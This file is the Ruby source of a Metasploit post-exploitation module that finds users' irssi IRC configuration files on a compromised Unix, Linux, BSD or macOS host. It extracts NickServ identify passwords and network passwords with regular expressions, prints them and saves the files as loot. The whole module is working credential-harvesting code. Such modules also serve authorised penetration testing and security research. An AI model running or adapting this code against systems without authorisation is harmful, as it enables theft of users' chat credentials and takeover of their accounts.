metasploit-framework/modules/post/multi/gather/irssi_creds.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather IRSSI IRC Password(s)',
        'Description' => %q{
          This module grabs IRSSI IRC credentials.
        },
        'Author' => [
          'Jonathan Claudius <jclaudius[at]mozilla.com>',
        ],
        'Platform' => %w[bsd linux osx unix],
        'SessionTypes' => %w[shell],
        'License' => MSF_LICENSE
      )
    )
  end

  def run
    print_status('Finding ~/.irssi/config')
    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
    paths = paths.select { |f| file?(f) }

    if paths.empty?
      print_error('No users found with a ~/.irssi/config file')
      return
    end

    download_passwords(paths)
  end

  # Example of what we're looking for in the config...
  #
  # ***Identify Password Example***
  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
  #
  # ***Network Password Example***
  #    password = "example_password";
  #
  def contains_passwords?(path)
    data = read_file(path)
    identify_passwords = data.scan(%r{/\^?msg nickserv identify ([^\s]+)})
    network_passwords = data.scan(/^?password = "([^\s]+)"/)

    passwords = identify_passwords.flatten + network_passwords.flatten

    if passwords.any?
      print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")
      return true
    end

    false
  end

  def download_passwords(paths)
    print_status "Looting #{paths.count} files"

    paths.each do |path|
      path.chomp!
      next if ['.', '..'].include?(path)

      next unless contains_passwords?(path)

      loot_path = store_loot(
        'irssi config file',
        'text/plain',
        session,
        read_file(path),
        path,
        'IRC Password'
      )
      print_good("irssi config with passwords stored in #{loot_path}")
    end
  end
end